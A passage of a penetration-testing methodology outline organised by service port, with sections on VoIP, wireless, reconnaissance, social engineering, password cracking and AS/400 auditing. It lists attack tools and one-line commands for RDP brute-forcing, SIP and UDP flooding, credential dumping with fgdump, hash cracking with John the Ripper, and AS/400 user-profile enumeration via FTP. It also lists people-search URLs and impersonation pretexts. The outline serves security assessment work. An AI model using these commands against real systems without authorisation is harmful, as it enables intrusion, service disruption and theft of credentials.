13.22.3.5. Blind SQL Injection
13.22.3.6. SQL Cheatsheets
13.22.3.6.1. Untitled
13.23. NFS Port 2049 open
13.23.1. NFS Enumeration
13.23.1.1. showmount -e hostname/ip_address
13.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
13.23.2. NFS Brute Force
13.23.2.1. Interact with NFS share and try to add/delete
13.23.2.2. Exploit and Confuse Unix
13.23.3. Examine Configuration Files
13.23.3.1. /etc/exports
13.23.3.2. /etc/lib/nfs/xtab
13.23.4. nmap nse script
13.23.4.1. nfs-showmount
13.24. Compaq/HP Insight Manager Port 2301,2381open
13.24.1. HP Enumeration
13.24.1.1. Authentication Method
13.24.1.1.1. Host OS Authentication
13.24.1.1.2. Default Authentication
13.24.1.2. Wikto
13.24.1.3. Nstealth
13.24.2. HP Bruteforce
13.24.2.1. Hydra
13.24.2.2. Acunetix
13.24.3. Examine Configuration Files
13.24.3.1. path.properties
13.24.3.2. mx.log
13.24.3.3. CLIClientConfig.cfg
13.24.3.4. database.props
13.24.3.5. pg_hba.conf
13.24.3.6. jboss-service.xml
13.24.3.7. .namazurc
13.25. MySQL port 3306 open
13.25.1. Enumeration
13.25.1.1. nmap -A -n -p3306 <IP Address>
13.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
13.25.1.3. telnet IP_Address 3306
13.25.1.4. use test; select * from test;
13.25.1.5. To check for other DB's -- show databases
13.25.2. Administration
13.25.2.1. MySQL Network Scanner
13.25.2.2. MySQL GUI Tools
13.25.2.3. mysqlshow
13.25.2.4. mysqlbinlog
13.25.3. Manual Checks
13.25.3.1. Default usernames and passwords
13.25.3.1.1. username: root password:
13.25.3.1.2. testing
13.25.3.2. Configuration Files
13.25.3.2.1. Operating System
13.25.3.2.2. Command History
13.25.3.2.3. Log Files
13.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
13.25.3.2.5. MySQL data directory (Location specified in my.cnf)
13.25.3.2.6. SSL Check
13.25.3.3. Privilege Escalation
13.25.3.3.1. Current Level of access
13.25.3.3.2. Access passwords
13.25.3.3.3. Create a new user and grant him privileges
13.25.3.3.4. Break into a shell
13.25.4. SQL injection
13.25.4.1. mysql-miner.pl
13.25.4.1.1. mysql-miner.pl http://target/ expected_string database
13.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
13.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
13.25.5. References.
13.25.5.1. Design Weaknesses
13.25.5.1.1. MySQL running as root
13.25.5.1.2. Exposed publicly on Internet
13.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
13.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
13.26. RDesktop port 3389 open
13.26.1. Rdesktop Enumeration
13.26.1.1. Remote Desktop Connection
13.26.2. Rdestop Bruteforce
13.26.2.1. TSGrinder
13.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
13.26.2.2. Tscrack
13.27. Sybase Port 5000+ open
13.27.1. Sybase Enumeration
13.27.1.1. sybase-version ip_address from NGS
13.27.2. Sybase Vulnerability Assessment
13.27.2.1. Use DBVisualiser
13.27.2.1.1. Sybase Security checksheet
13.27.2.1.2. Manual sql input of previously reported vulnerabilties
13.27.2.2. NGS Squirrel for Sybase
13.28. SIP Port 5060 open
13.28.1. SIP Enumeration
13.28.1.1. netcat
13.28.1.1.1. nc IP_Address Port
13.28.1.2. sipflanker
13.28.1.2.1. python sipflanker.py 192.168.1-254
13.28.1.3. Sipscan
13.28.1.4. smap
13.28.1.4.1. smap IP_Address/Subnet_Mask
13.28.1.4.2. smap -o IP_Address/Subnet_Mask
13.28.1.4.3. smap -l IP_Address
13.28.2. SIP Packet Crafting etc.
13.28.2.1. sipsak
13.28.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
13.28.2.1.2. Options request:- sipsak -vv -s sip:username@domain
13.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
13.28.2.2. siprogue
13.28.3. SIP Vulnerability Scanning/ Brute Force
13.28.3.1. tftp bruteforcer
13.28.3.1.1. Default dictionary file
13.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
13.28.3.2. VoIPaudit
13.28.3.3. SiVuS
13.28.4. Examine Configuration Files
13.28.4.1. SIPDefault.cnf
13.28.4.2. asterisk.conf
13.28.4.3. sip.conf
13.28.4.4. phone.conf
13.28.4.5. sip_notify.conf
13.28.4.6. <Ethernet address>.cfg
13.28.4.7. 000000000000.cfg
13.28.4.8. phone1.cfg
13.28.4.9. sip.cfg etc. etc.
13.29. VNC port 5900^ open
13.29.1. VNC Enumeration
13.29.1.1. Scans
13.29.1.1.1. 5900^ for direct access.5800 for HTTP access.
13.29.2. VNC Brute Force
13.29.2.1. Password Attacks
13.29.2.1.1. Remote
13.29.2.1.2. Local
13.29.3. Exmine Configuration Files
13.29.3.1. .vnc
13.29.3.2. /etc/vnc/config
13.29.3.3. $HOME/.vnc/config
13.29.3.4. /etc/sysconfig/vncservers
13.29.3.5. /etc/vnc.conf
13.30. Tor Port 9001, 9030 open
13.30.1. Tor Node Checker
13.30.1.1. Ip Pages
13.30.1.2. Kewlio.net
13.30.2. nmap NSE script
13.31. Jet Direct 9100 open
13.31.1. hijetta
14. VoIP Security
14.1. Sniffing Tools
14.1.1. AuthTool
14.1.2. Cain & Abel
14.1.3. Etherpeek
14.1.4. NetDude
14.1.5. Oreka
14.1.6. PSIPDump
14.1.7. SIPomatic
14.1.8. SIPv6 Analyzer
14.1.9. UCSniff
14.1.10. VoiPong
14.1.11. VOMIT
14.1.12. Wireshark
14.1.13. WIST - Web Interface for SIP Trace
14.2. Scanning and Enumeration Tools
14.2.1. enumIAX
14.2.2. fping
14.2.3. IAX Enumerator
14.2.4. iWar
14.2.5. Nessus
14.2.6. Nmap
14.2.7. SIP Forum Test Framework (SFTF)
14.2.8. SIPcrack
14.2.9. sipflanker
14.2.9.1. python sipflanker.py 192.168.1-254
14.2.10. SIP-Scan
14.2.11. SIP.Tastic
14.2.12. SIPVicious
14.2.13. SiVuS
14.2.14. SMAP
14.2.14.1. smap IP_Address/Subnet_Mask
14.2.14.2. smap -o IP_Address/Subnet_Mask
14.2.14.3. smap -l IP_Address
14.2.15. snmpwalk
14.2.16. VLANping
14.2.17. VoIPAudit
14.2.18. VoIP GHDB Entries
14.2.19. VoIP Voicemail Database
14.3. Packet Creation and Flooding Tools
14.3.1. H.323 Injection Files
14.3.2. H225regreject
14.3.3. IAXHangup
14.3.4. IAXAuthJack
14.3.5. IAX.Brute
14.3.6. IAXFlooder
14.3.6.1. ./iaxflood sourcename destinationname numpackets
14.3.7. INVITE Flooder
14.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
14.3.8. kphone-ddos
14.3.9. RTP Flooder
14.3.10. rtpbreak
14.3.11. Scapy
14.3.12. Seagull
14.3.13. SIPBomber
14.3.14. SIPNess
14.3.15. SIPp
14.3.16. SIPsak
14.3.16.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
14.3.16.2. Options request:- sipsak -vv -s sip:username@domain
14.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
14.3.17. SIP-Send-Fun
14.3.18. SIPVicious
14.3.19. Spitter
14.3.20. TFTP Brute Force
14.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
14.3.21. UDP Flooder
14.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
14.3.22. UDP Flooder (with VLAN Support)
14.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
14.3.23. Voiphopper
14.4. Fuzzing Tools
14.4.1. Asteroid
14.4.2. Codenomicon VoIP Fuzzers
14.4.3. Fuzzy Packet
14.4.4. Mu Security VoIP Fuzzing Platform
14.4.5. ohrwurm RTP Fuzzer
14.4.6. PROTOS H.323 Fuzzer
14.4.7. PROTOS SIP Fuzzer
14.4.8. SIP Forum Test Framework (SFTF)
14.4.9. Sip-Proxy
14.5. Signaling Manipulation Tools
14.5.1. AuthTool
14.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
14.5.2. BYE Teardown
14.5.3. Check Sync Phone Rebooter
14.5.4. RedirectPoison
14.5.5. Registration Adder
14.5.6. Registration Eraser
14.5.7. Registration Hijacker
14.5.8. SIP-Kill
14.5.9. SIP-Proxy-Kill
14.5.10. SIP-RedirectRTP
14.5.11. vnak
14.6. Media Manipulation Tools
14.6.1. RTP InsertSound
14.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
14.6.2. RTP MixSound
14.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
14.6.3. RTPProxy
14.6.4. RTPInject
14.7. Generic Software Suites
14.7.1. OAT Office Communication Server Tool Assessment
14.7.2. EnableSecurity VOIPPACK
14.7.2.1. Note: - Add-on for Immunity Canvas
14.8. References
14.8.1. URL's
14.8.1.1. Common Vulnerabilities and Exploits (CVE)
14.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
14.8.1.2. Default Passwords
14.8.1.3. Hacking Exposed VoIP
14.8.1.3.1. Tool Pre-requisites
14.8.1.4. VoIPsa
14.8.2. White Papers
14.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
14.8.2.2. An Analysis of VoIP Security Threats and Tools
14.8.2.3. Hacking VoIP Exposed
14.8.2.4. Security testing of SIP implementations
14.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
14.8.2.6. Two attacks against VoIP
14.8.2.7. VoIP Attacks!
14.8.2.8. VoIP Security Audit Program (VSAP)
14.8.3. Spirent ThreatEx
15. Wireless Penetration
15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
15.1.1. Site Map
15.1.1.1. RF Map
15.1.1.1.1. Lines of Sight
15.1.1.1.2. Signal Coverage
15.1.1.2. Physical Map
15.1.1.2.1. Triangulate APs
15.1.1.2.2. Satellite Imagery
15.1.2. Network Map
15.1.2.1. MAC Filter
15.1.2.1.1. Authorised MAC Addresses
15.1.2.1.2. Reaction to Spoofed MAC Addresses
15.1.2.2. Encryption Keys utilised
15.1.2.2.1. WEP
15.1.2.2.2. WPA/PSK
15.1.2.2.3. 802.1x
15.1.2.3. Access Points
15.1.2.3.1. ESSID
15.1.2.3.2. BSSIDs
15.1.2.4. Wireless Clients
15.1.2.4.1. MAC Addresses
15.1.2.4.2. Intercepted Traffic
15.2. SipRogue
15.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
15.4. Wireless Toolkit
15.4.1. Wireless Discovery
15.4.1.1. Aerosol
15.4.1.2. Airfart
15.4.1.3. Aphopper
15.4.1.4. Apradar
15.4.1.5. BAFFLE
15.4.1.6. inSSIDer
15.4.1.7. iWEPPro
15.4.1.8. karma
15.4.1.9. KisMAC-ng
15.4.1.10. Kismet
15.4.1.11. MiniStumbler
15.4.1.12. Netstumbler
15.4.1.13. Vistumbler
15.4.1.14. Wellenreiter
15.4.1.15. Wifi Hopper
15.4.1.16. WirelessMon
15.4.1.17. WiFiFoFum
15.4.2. Packet Capture
15.4.2.1. Airopeek
15.4.2.2. Airpcap
15.4.2.3. Airtraf
15.4.2.4. Apsniff
15.4.2.5. Cain
15.4.2.6. Commview
15.4.2.7. Ettercap
15.4.2.8. Netmon
15.4.2.8.1. nmwifi
15.4.2.9. Wireshark
15.4.3. EAP Attack tools
15.4.3.1. eapmd5pass
15.4.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
15.4.3.1.2. Untitled
15.4.4. Leap Attack Tools
15.4.4.1. asleap
15.4.4.2. thc leap cracker
15.4.4.3. anwrap
15.4.5. WEP/ WPA Password Attack Tools
15.4.5.1. Airbase
15.4.5.2. Aircrack-ptw
15.4.5.3. Aircrack-ng
15.4.5.4. Airsnort
15.4.5.5. cowpatty
15.4.5.6. FiOS Wireless Key Calculator
15.4.5.7. iWifiHack
15.4.5.8. KisMAC-ng
15.4.5.9. Rainbow Tables
15.4.5.10. wep attack
15.4.5.11. wep crack
15.4.5.12. wzcook
15.4.6. Frame Generation Software
15.4.6.1. Airgobbler
15.4.6.2. airpwn
15.4.6.3. Airsnarf
15.4.6.4. Commview
15.4.6.5. fake ap
15.4.6.6. void 11
15.4.6.7. wifi tap
15.4.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
15.4.6.8. FreeRADIUS - Wireless Pwnage Edition
15.4.7. Mapping Software
15.4.7.1. Online Mapping
15.4.7.1.1. WIGLE
15.4.7.1.2. Skyhook
15.4.7.2. Tools
15.4.7.2.1. Knsgem
15.4.8. File Format Conversion Tools
15.4.8.1. ns1 recovery and conversion tool
15.4.8.2. warbable
15.4.8.3. warkizniz
15.4.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
15.4.8.4. ivstools
15.4.9. IDS Tools
15.4.9.1. WIDZ
15.4.9.2. War Scanner
15.4.9.3. Snort-Wireless
15.4.9.4. AirDefense
15.4.9.5. AirMagnet
15.5. WLAN discovery
15.5.1. Unencrypted WLAN
15.5.1.1. Visible SSID
15.5.1.1.1. Sniff for IP range
15.5.1.2. Hidden SSID
15.5.1.2.1. Deauth client
15.5.2. WEP encrypted WLAN
15.5.2.1. Visible SSID
15.5.2.1.1. WEPattack
15.5.2.2. Hidden SSID
15.5.2.2.1. Deauth client
15.5.3. WPA / WPA2 encrypted WLAN
15.5.3.1. Deauth client
15.5.3.1.1. Capture EAPOL handshake
15.5.4. LEAP encrypted WLAN
15.5.4.1. Deauth client
15.5.4.1.1. Break LEAP
15.5.5. 802.1x WLAN
15.5.5.1. Create Rogue Access Point
15.5.5.1.1. Airsnarf
15.5.5.1.2. fake ap
15.5.5.1.3. Hotspotter
15.5.5.1.4. Karma
15.5.5.1.5. Linux rogue AP
15.5.6. Resources
15.5.6.1. URL's
15.5.6.1.1. Wirelessdefence.org
15.5.6.1.2. Russix
15.5.6.1.3. Wardrive.net
15.5.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
15.5.6.2. White Papers
15.5.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
15.5.6.2.2. 802.11b Firmware-Level Attacks
15.5.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
15.5.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
15.5.6.2.5. Breaking 104 bit WEP in less than 60 seconds
15.5.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
15.5.6.2.7. Active behavioral fingerprinting of wireless devices
15.5.6.3. Common Vulnerabilities and Exploits (CVE)
15.5.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
16. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
17. http://secunia.com/advisories/search/?search=citrix
18. Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
18.1. Untitled
18.1.1. Authoratitive Bodies
18.1.1.1. IANA - Internet Assigned Numbers Authority
18.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
18.1.1.3. NRO - Number Resource Organisation
18.1.1.4. RIR - Regional Internet Registry
18.1.1.4.1. AFRINIC - African Network Information Centre
18.1.1.4.2. APNIC - Asia Pacific Network Information Centre
18.1.1.4.3. ARIN - American Registry for Internet Numbers
18.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
18.1.1.4.5. RIPE - Reseaux IP Européens—Network Coordination Centre
18.1.2. Websites
18.1.2.1. Central Ops
18.1.2.1.1. Domain Dossier
18.1.2.1.2. Email Dossier
18.1.2.2. DNS Stuff
18.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
18.1.2.3. Fixed Orbit
18.1.2.3.1. Autonomous System lookups and other online tools available.
18.1.2.4. Geektools
18.1.2.5. IP2Location
18.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
18.1.2.6. Kartoo
18.1.2.6.1. Metasearch engine that visually presents its results.
18.1.2.7. MyIPNeighbors.com
18.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
18.1.2.8. My-IP-Neighbors.com
18.1.2.8.1. Excellent site that can be used if the above is down
18.1.2.9. myipneighbors.net
18.1.2.10. Netcraft
18.1.2.10.1. Online search tool allowing queries for host information.
18.1.2.11. Passive DNS Replication
18.1.2.11.1. Finds shared domains based on supplied IP addresses
18.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
18.1.2.12. Robtex
18.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
18.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
18.1.2.13. Traceroute.org
18.1.2.13.1. Website listing a large number links to online traceroute resources.
18.1.2.14. Wayback Machine
18.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
18.1.2.15. Whois.net
18.1.3. Tools
18.1.3.1. Cheops-ng
18.1.3.2. Country whois
18.1.3.3. Domain Research Tool
18.1.3.4. Firefox Plugins
18.1.3.4.1. AS Number
18.1.3.4.2. Shazou
18.1.3.4.3. Firecat Suite
18.1.3.5. Gnetutil
18.1.3.6. Goolag Scanner
18.1.3.7. Greenwich
18.1.3.8. Maltego
18.1.3.9. GTWhois
18.1.3.10. Sam Spade
18.1.3.11. Smart whois
18.1.3.12. SpiderFoot
18.2. Internet Search
18.2.1. General Information
18.2.1.1. Web Investigator
18.2.1.2. Tracesmart
18.2.1.3. Friends Reunited
18.2.1.4. Ebay - profiles etc.
18.2.2. Financial
18.2.2.1. EDGAR - Company information, including real-time filings. US
18.2.2.2. Google Finance - General Finance Portal
18.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
18.2.2.4. Companies House UK
18.2.2.5. Land Registry UK
18.2.3. Phone book/ Electoral Role Information
18.2.3.1. 123people
18.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
18.2.3.2. 192.com
18.2.3.2.1. Electoral Role Search. UK
18.2.3.3. 411
18.2.3.3.1. Online White Pages and Yellow Pages. US
18.2.3.4. Untitled
18.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
18.2.3.5. BT.com. UK
18.2.3.5.1. Residential
18.2.3.5.2. Business
18.2.3.6. Pipl
18.2.3.6.1. Untitled
18.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
18.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
18.2.3.7. Spokeo
18.2.3.7.1. http://www.spokeo.com/user?q=domain_name
18.2.3.7.2. http://www.spokeo.com/user?q=email_address
18.2.3.8. Yasni
18.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
18.2.3.9. Zabasearch
18.2.3.9.1. People Search Engine. US
18.2.4. Generic Web Searching
18.2.4.1. Code Search
18.2.4.2. Forum Entries
18.2.4.3. Google Hacking Database
18.2.4.4. Google
18.2.4.4.1. Email Addresses
18.2.4.4.2. Contact Details
18.2.4.5. Newsgroups/forums
18.2.4.6. Blog Search
18.2.4.6.1. Yammer
18.2.4.6.2. Google Blog Search
18.2.4.6.3. Technorati
18.2.4.6.4. Jaiku
18.2.4.6.5. Present.ly
18.2.4.6.6. Twitter Network Browser
18.2.4.7. Search Engine Comparison/ Aggregator Sites
18.2.4.7.1. Clusty
18.2.4.7.2. Grokker
18.2.4.7.3. Zuula
18.2.4.7.4. Exalead
18.2.4.7.5. Delicious
18.2.5. Metadata Search
18.2.5.1. Untitled
18.2.5.1.1. MetaData Visualisation Sites
18.2.5.1.2. Tools
18.2.5.1.3. Wikipedia Metadata Search
18.2.6. Social/ Business Networks
18.2.6.1. Untitled
18.2.6.1.1. Africa
18.2.6.1.2. Australia
18.2.6.1.3. Belgium
18.2.6.1.4. Holland
18.2.6.1.5. Hungary
18.2.6.1.6. Iran
18.2.6.1.7. Japan
18.2.6.1.8. Korea
18.2.6.1.9. Poland
18.2.6.1.10. Russia
18.2.6.1.11. Sweden
18.2.6.1.12. UK
18.2.6.1.13. US
18.2.6.1.14. Assorted
18.2.7. Resources
18.2.7.1. OSINT
18.2.7.2. International Directory of Search Engines
18.3. DNS Record Retrieval from publically available servers
18.3.1. Types of Information Records
18.3.1.1. SOA Records - Indicates the server that has authority for the domain.
18.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
18.3.1.3. NS Records - List of a host’s or domain’s name server(s).
18.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
18.3.1.5. PTR Records - Lists a host’s domain name, host identified by its IP address.
18.3.1.6. SRV Records - Service location record.
18.3.1.7. HINFO Records - Host information record with CPU type and operating system.
18.3.1.8. TXT Records - Generic text record.
18.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
18.3.1.10. RP - Responsible person for the domain.
18.3.2. Database Settings
18.3.2.1. Version.bind
18.3.2.2. Serial
18.3.2.3. Refresh
18.3.2.4. Retry
18.3.2.5. Expiry
18.3.2.6. Minimum
18.3.3. Sub Domains
18.3.4. Internal IP ranges
18.3.4.1. Reverse DNS for IP Range
18.3.5. Zone Transfer
18.4. Social Engineering
18.4.1. Remote
18.4.1.1. Phone
18.4.1.1.1. Scenarios
18.4.1.1.2. Results
18.4.1.1.3. Contact Details
18.4.1.2. Email
18.4.1.2.1. Scenarios
18.4.1.2.2. Software
18.4.1.2.3. Results
18.4.1.2.4. Contact Details
18.4.1.3. Other
18.4.2. Local
18.4.2.1. Personas
18.4.2.1.1. Name
18.4.2.1.2. Phone
18.4.2.1.3. Email
18.4.2.1.4. Business Cards
18.4.2.2. Contact Details
18.4.2.2.1. Name
18.4.2.2.2. Phone number
18.4.2.2.3. Email
18.4.2.2.4. Room number
18.4.2.2.5. Department
18.4.2.2.6. Role
18.4.2.3. Scenarios
18.4.2.3.1. New IT employee
18.4.2.3.2. Fire Inspector
18.4.2.4. Results
18.4.2.5. Maps
18.4.2.5.1. Satalitte Imagery
18.4.2.5.2. Building layouts
18.4.2.6. Other
18.5. Dumpster Diving
18.5.1. Rubbish Bins
18.5.2. Contract Waste Removal
18.5.3. Ebay ex-stock sales i.e. HDD
18.6. Web Site copy
18.6.1. htttrack
18.6.2. teleport pro
18.6.3. Black Widow
19. Password cracking
19.1. Rainbow crack
19.1.1. ophcrack
19.1.2. rainbow tables
19.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
19.2. Ophcrack
19.3. Cain & Abel
19.4. John the Ripper
19.4.1. ./unshadow passwd shadow > file_to_crack
19.4.2. ./john -single file_to_crack
19.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
19.4.4. ./john -show file_to_crack
19.4.5. ./john --incremental:All file_to_crack
19.5. fgdump
19.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
19.6. pwdump6
19.7. medusa
19.8. LCP
19.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
19.9.1. Domain credentials
19.9.2. Sniffing
19.9.3. pwdump import
19.9.4. sam import
19.10. aiocracker
19.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
20. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
20.1. Manual
20.1.1. Patch Levels
20.1.2. Confirmed Vulnerabilities
20.1.2.1. Severe
20.1.2.2. High
20.1.2.3. Medium
20.1.2.4. Low
20.2. Automated
20.2.1. Reports
20.2.2. Vulnerabilities
20.2.2.1. Severe
20.2.2.2. High
20.2.2.3. Medium
20.2.2.4. Low
20.3. Tools
20.3.1. GFI
20.3.2. Nessus (Linux)
20.3.2.1. Nessus (Windows)
20.3.3. NGS Typhon
20.3.4. NGS Squirrel for Oracle
20.3.5. NGS Squirrel for SQL
20.3.6. SARA
20.3.7. MatriXay
20.3.8. BiDiBlah
20.3.9. SSA
20.3.10. Oval Interpreter
20.3.11. Xscan
20.3.12. Security Manager +
20.3.13. Inguma
20.4. Resources
20.4.1. Security Focus
20.4.2. Microsoft Security Bulletin
20.4.3. Common Vulnerabilities and Exploits (CVE)
20.4.4. National Vulnerability Database (NVD)
20.4.5. The Open Source Vulnerability Database (OSVDB)
20.4.5.1. Standalone Database
20.4.5.1.1. Update URL
20.4.6. United States Computer Emergency Response Team (US-CERT)
20.4.7. Computer Emergency Response Team
20.4.8. Mozilla Security Information
20.4.9. SANS
20.4.10. Securiteam
20.4.11. PacketStorm Security
20.4.12. Security Tracker
20.4.13. Secunia
20.4.14. Vulnerabilities.org
20.4.15. ntbugtraq
20.4.16. Wireless Vulnerabilities and Exploits (WVE)
20.5. Blogs
20.5.1. Carnal0wnage
20.5.2. Fsecure Blog
20.5.3. g0ne blog
20.5.4. GNUCitizen
20.5.5. ha.ckers Blog
20.5.6. Jeremiah Grossman Blog
20.5.7. Metasploit
20.5.8. nCircle Blogs
20.5.9. pentest mokney.net
20.5.10. Rational Security
20.5.11. Rise Security
20.5.12. Security Fix Blog
20.5.13. Software Vulnerability Exploitation Blog
20.5.14. Taosecurity Blog
21. AS/400 Auditing
21.1. Remote
21.1.1. Information Gathering
21.1.1.1. Nmap using common iSeries (AS/400) services.
21.1.1.1.1. Unsecured services (Port;name;description)
21.1.1.1.2. Secured services (Port;name;description)
21.1.1.2. NetCat (old school technique)
21.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
21.1.1.3. Banners Grabbing
21.1.1.3.1. Telnet
21.1.1.3.2. FTP
21.1.1.3.3. HTTP Banner
21.1.1.3.4. POP3
21.1.1.3.5. SNMP
21.1.1.3.6. SMTP
21.1.2. Users Enumeration
21.1.2.1. Default AS/400 users accounts
21.1.2.2. Error messages
21.1.2.2.1. Telnet Login errors
21.1.2.2.2. POP3 authentication Errors
21.1.2.3. Qsys symbolic link (if ftp is enabled)
21.1.2.3.1. ftp target | quote stat | quote site namefmt 1
21.1.2.3.2. cd /
21.1.2.3.3. quote site listfmt 1
21.1.2.3.4. mkdir temp
21.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
21.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
21.1.2.3.7. dir /temp/qsys/*.usrprf
21.1.2.4. LDAP
21.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
21.1.2.4.2. Tool to browse LDAP
21.1.3. Exploitation
21.1.3.1. CVE References
21.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
21.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
21.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
21.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
21.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
21.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
21.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
21.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
21.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
21.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
21.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
21.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
21.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
21.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
21.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
21.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
21.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
21.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
21.1.3.2. Access with Work Station Gateway
21.1.3.2.1. http://target:5061/WSG
21.1.3.2.2. Default AS/400 accounts.
21.1.3.3. Network attacks (next release)
21.1.3.3.1. DB2
21.1.3.3.2. QSHELL
21.1.3.3.3. Hijacking Terminals
21.1.3.3.4. Trojan attacks
21.1.3.3.5. Hacking from AS/400
21.2. Local
21.2.1. System Value Security
21.2.1.1. Untitled
